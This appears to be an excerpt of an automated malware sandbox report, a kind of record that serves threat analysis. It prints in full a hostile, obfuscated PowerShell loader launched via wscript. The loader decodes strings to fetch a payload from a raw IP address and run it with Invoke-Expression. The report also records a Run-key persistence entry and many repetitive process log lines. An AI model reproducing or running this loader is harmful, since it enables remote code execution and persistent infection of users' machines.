Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BAB7958 push ebx; retf 7_2_00007FFD9BAB796A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BAB00BD pushad ; iretd 7_2_00007FFD9BAB00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB847BB push es; iretd 7_2_00007FFD9BB847BC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB84B35 push es; iretd 7_2_00007FFD9BB84B62
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB84EED push es; iretd 7_2_00007FFD9BB84F6A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB82AC5 push edx; retf 7_2_00007FFD9BB82AC6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB848F5 push es; iretd 7_2_00007FFD9BB848F6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BB854CE push es; iretd 7_2_00007FFD9BB854CF
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04743AD9 push ebx; retf 10_2_04743ADA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_076508C2 push eax; mov dword ptr [esp], ecx10_2_07650AC4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B309AD push ecx; mov dword ptr [esp], ecx15_2_23B309B6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C209AD push ecx; mov dword ptr [esp], ecx20_2_04C209B6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009DB185 push esi; iretd 20_2_009DB186
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009DB2C0 push cs; iretd 20_2_009DB2C1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009DB663 push cs; retf 20_2_009DB664
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E07EB push ecx; ret 20_2_009E07EC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E0899 push ebx; iretd 20_2_009E089A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E8A80 push esp; retf 20_2_009E8AAA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E0D40 push esp; ret 20_2_009E0D57
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D1E18 push ebp; retf 20_2_009D1E1D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D3E53 push es; ret 20_2_009D3E56
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
